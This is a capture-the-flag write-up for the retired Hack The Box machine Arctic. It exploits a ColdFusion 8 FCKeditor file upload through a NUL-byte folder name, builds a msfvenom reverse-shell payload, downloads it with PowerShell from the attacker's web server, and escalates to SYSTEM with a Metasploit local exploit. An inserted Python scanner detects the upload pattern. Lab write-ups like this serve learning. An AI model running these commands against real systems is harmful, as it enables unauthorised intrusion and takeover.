This is the write-up for the box Arctic, which was retired on 7 July 2017. My IP address was 10.10.14.13 while I did this.
Let's put this in our hosts file:
10.10.10.11 arctic.htb
Starting with an Nmap scan (normal output saved with -oN):
nmap -sC -sV -oN nmap/arctic.nmap 10.10.10.11
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Browsing to port 8500 gives us an index page with two folders called CFIDE and cfdocs. Under the path CFIDE/administrator/ we are forwarded to a web page that displays a login prompt for Adobe ColdFusion 8.
Searching for known vulnerabilities turns up "ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)" for this version of Adobe ColdFusion; it has a Metasploit module that we are going to use.
searchsploit coldfusion
In Metasploit we can use the module now:
use exploit/windows/http/coldfusion_fckeditor
set RHOSTS 10.10.10.11
set RPORT 8500
Because the server responds very slowly to requests and the payload does not wait long, this will fail. Let us examine why it fails by sending the request through Burp Suite.
Burp Suite: Proxy --> Options --> Add Proxy Listener
- Bind to port: 8500
- Bind to address: 127.0.0.1
- Redirect to host: 10.10.10.11
- Redirect to port: 8500
Now we can point the Metasploit module at localhost:8500 so the payload runs against the local listener and we can examine the traffic in Burp Suite:
set RHOSTS 127.0.0.1
The POST request we are sending looks like this:
POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/G.jsp%00 HTTP/1.1
Host: 127.0.0.1:8500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_559_3663607441_2109420688
Content-Length: 1588
Connection: close
--_Part_559_3663607441_2109420688
Content-Disposition: form-data; name="newfile"; filename="KCNKUAKE.txt"
Content-Type: application/x-java-archive
(...payload code...)
The cause is the NULL byte at the end of the folder name (G.jsp%00): it terminates the path before the filename (KCNKUAKE.txt) can be created, while the response still reports the full path:
window.parent.OnUploadCompleted( 0, "/userfiles/file/G.jsp/KCNKUAKE.txt", "KCNKUAKE.txt", "0" );
If we manually browse to http://10.10.10.11:8500/userfiles/file/G.jsp with a listener running on port 4444, we get a reverse shell after a short wait.
Now we have a shell on the box as the user tolis. Since we still want a Meterpreter session, we create a payload with msfvenom and upload it to the box.
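A defender-side check for the request pattern described above, added here as an example that is not part of the original write-up: it parses a few constructed access-log lines (the log format is assumed) and flags FCKeditor connector uploads whose CurrentFolder parameter carries a NUL byte or a script extension, as well as requests for a script file served out of /userfiles/.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (format assumed): "<client> <method> <request-target> <status>"
SAMPLE_LOG = """\
10.10.14.13 GET /CFIDE/administrator/index.cfm 200
10.10.14.13 POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/G.jsp%00 200
10.10.14.13 POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/docs/ 200
10.10.14.13 POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/x.cfm%2500 200
10.10.14.13 GET /userfiles/file/G.jsp 200
"""

CONNECTOR_PATH = "/fckeditor/editor/filemanager/connectors/"
UPLOAD_DIR = "/userfiles/"
SCRIPT_EXT = re.compile(r"\.(jsp|jspx|cfm|cfml|cfc|asp|aspx|php)$", re.IGNORECASE)

def inspect_request(request_target):
    """Return a reason string when the request matches one of the abuse
    patterns from the write-up, else None."""
    parts = urlsplit(request_target)
    path = parts.path.lower()
    if path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
        # An executable script being served from the connector's upload directory
        return "script requested from upload directory"
    if CONNECTOR_PATH not in path:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for folder in params.get("CurrentFolder", []):
        decoded = unquote(folder)  # one extra decode also catches double-encoded %2500
        if "\x00" in decoded:
            return "NUL byte in CurrentFolder"
        if SCRIPT_EXT.search(decoded.rstrip("/")):
            return "server-script extension used as folder name"
    return None

def scan_log(text):
    """Return (client, method, request-target, reason) for every flagged line."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # malformed or blank line
        client, method, target, _status = fields
        reason = inspect_request(target)
        if reason:
            findings.append((client, method, target, reason))
    return findings

if __name__ == "__main__":
    for client, method, target, reason in scan_log(SAMPLE_LOG):
        print(f"{client} {method} {target.split('?')[0]} -> {reason}")
```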
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=9001 -f exe > exploit.exe
To get the payload onto the box we start a web server on our local machine and download the file from the box with PowerShell (the original command wrapped the call in IEX, which is unnecessary because DownloadFile returns nothing):
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.14.13:8000/exploit.exe','exploit.exe')"
Executing the downloaded exploit.exe then gives us a Meterpreter session in Metasploit.
Now we can use the local_exploit_suggester module to enumerate vulnerabilities:
use post/multi/recon/local_exploit_suggester
Migrate the Meterpreter session into a 64-bit process before running the exploit. We will use the suggested exploit exploit/windows/local/ms10_092_schelevator to escalate our privileges.
use exploit/windows/local/ms10_092_schelevator
set session 1
run
When this exploit finishes we get a session back as NT AUTHORITY\SYSTEM and have finished the box!